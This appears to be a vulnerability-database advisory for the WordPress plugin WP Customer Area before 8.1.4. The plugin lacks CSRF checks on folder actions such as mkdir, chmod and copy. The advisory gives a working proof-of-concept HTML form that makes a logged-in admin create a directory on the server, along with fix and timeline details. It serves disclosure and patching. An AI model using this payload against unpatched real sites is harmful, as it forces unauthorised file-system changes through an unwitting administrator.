WordPress Plugin Vulnerabilities
WP Customer Area < 8.1.4 - Unauthorised Actions via CSRF
Description
The plugin does not have CSRF checks when performing some actions such as chmod, mkdir and copy, which could allow attackers to make a logged-in admin perform them and create arbitrary folders, copy file for example.
Proof of Concept
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="https://example.com/wp-admin/admin-ajax.php"><table><tr><td>action</td><td><input type="text" value="cuar_folder_action" name="action"></td></tr> <tr><td>folder_action</td><td><input type="text" value="mkdir" name="folder_action"></td></tr> <tr><td>path</td><td><input type="text" value="/var/www/html/wp-content/tmpp" name="path"></td></tr> <tr><td>extra</td><td><input type="text" value="0770" name="extra"></td></tr> </table><input type="submit" value="https://example.com/wp-admin/admin-ajax.php"></form></html>
Affects Plugins
Fixed in version 8.1.4
References
Classification
Miscellaneous
Original Researcher
rezaduty
Submitter
rezaduty
Verified
Yes
Timeline
Publicly Published
2023-01-17 (about 4 months ago)
Added
2023-01-17 (about 4 months ago)
Last Updated
2023-01-18 (about 4 months ago)